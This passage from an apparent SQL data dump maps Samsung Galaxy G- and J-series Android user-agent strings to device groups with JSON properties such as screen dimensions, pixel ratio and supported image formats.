Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G398FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G611F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G611FF) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G611M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G611MT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G885F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G892A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G892U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G9500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G950F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G950N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G950U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G950U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G950W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G955F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G955N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G955U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G955U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G955W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G9600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G960F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G960U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G960U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G960W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G9650) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G965F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G965U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G965U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G970F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G970U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G973F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G973U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G973W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G975F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G975U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":157,\"screenHeight\":331,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G975U1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G975W) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G977B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_g','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":869,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J330F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J330FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J330G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J337A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J337P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J337R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J337V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J400F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J400M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J415F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J415FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J415G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J530F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J530FM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J530G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J530Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J600F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J600FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J600G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J600GT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":740,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J610F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J610FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J610G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J701F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J701M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J701MT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J720F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J720M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J730F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J730FM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J730G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J730GM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J737P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J737R4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J737T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J737T1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J737U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J810F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J810G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J810M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-J810Y) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_sm_j','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":846,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-M105F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 